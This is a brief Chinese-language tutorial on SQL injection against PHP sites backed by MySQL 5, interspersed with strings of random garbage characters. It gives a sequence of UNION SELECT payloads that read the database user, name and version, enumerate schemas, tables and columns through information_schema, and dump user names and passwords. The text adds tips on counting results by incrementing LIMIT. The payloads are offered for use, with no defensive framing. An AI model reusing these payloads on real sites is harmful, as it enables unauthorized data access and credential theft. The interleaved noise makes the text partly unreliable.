; r/ p% b2 Q9 L$ D1 h, J$ P教程内容:Mysql 5+php 注入6 i7 y* O: y3 } [0 _
9 ?8 J* B6 s* g# Q5 ^2 Q
) m6 N# ?4 [8 L% @% b
0 u4 m& l, ^% z) ?& T- F一.查看MYSQL基本信息(库名,版本,用户)" s% j' x* R* N7 D
: G" X# @: `! ?. w
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
2 ]8 ~5 h2 o$ D; g8 C v l/ |: q5 R' L# B( C/ E% h/ j
二.查数据库7 O7 U1 S/ Y. k0 M
" s. ~6 |5 F7 m1 v
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
8 P# b- L4 R6 \4 A) t, F) Q7 ], Rlimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
8 H& M- a& M% ~# f6 a% |2 B' O& K( S4 Z+ @
三.暴表
* G. I: g% a: Z6 f2 X1 |6 d
- @0 W1 d* h3 Z6 T8 _1 G: Yand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*9 @: n, g" k9 R: b) L! Z
- x, r2 G' f$ M; Y; xlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。1 F9 u( A! H! J: ~. C- K
- R8 H8 ]6 S: z9 q+ |
四.暴字段8 K) A# h. _& O# U9 ~/ }
) r: |( X* r: _* gand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*: f7 A( H7 q2 }
2 l0 @" B) w6 ~, \0 g. c; l5 W+ G- J
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。1 i$ J. u) |- P
& x$ ?$ j" g( M4 W$ _
五.暴数据1 k% B1 @" g/ T- h
( p$ h5 u% C: w4 c1 Tand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*% b% E7 G1 S3 t) j! [
; i* s( P" ]& B, g; x
7 k. ?* }* e" y: r% z这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
# C n: Y0 Y% D2 o! s! U' x |